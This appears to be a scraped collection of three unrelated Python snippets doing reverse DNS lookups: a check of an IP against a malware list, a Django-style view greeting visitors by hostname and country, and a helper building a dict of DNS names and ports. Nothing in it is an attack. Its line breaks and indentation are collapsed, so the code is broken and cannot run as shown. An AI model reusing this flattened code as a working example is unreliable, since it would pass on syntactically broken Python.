def lookup(ip, malwarelist): addr=reversename.from_address(ip) responses = [] try: for response in resolver.query(addr, "PTR"): responses.append(str(response)) except Exception: pass if ip in malwarelist: return '\n '.join(responses), "True" else: return '\n '.join(responses), "False"
def index(request): ip = request.META["REMOTE_ADDR"] country = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE).country_name_by_addr(ip) if country: fr = "from " + country else: fr = "" try: addr = reversename.from_address(ip) name = str(resolver.query(addr,"PTR")[0]) + "( " + ip + " ) " except (resolver.NXDOMAIN, resolver.NoAnswer): # no reverse dns lookup match name = ip return HttpResponse("Hello " + name + fr)
def dnsptr(addrtuple,prefix=""): dnsnames=[] ip="0.0.0.0" port="0" if len(addrtuple)>1: ip=addrtuple[0] port=addrtuple[1] revaddr=reversename.from_address(ip) try: dnsnames=sorted([a.to_text().strip('.') for a in resolver.query(revaddr,"PTR").rrset]) except resolver.NXDOMAIN: pass addrdict={'%sdnsnames'%prefix:dnsnames,'%sport'%prefix:port,'%sip'%prefix:ip} return addrdict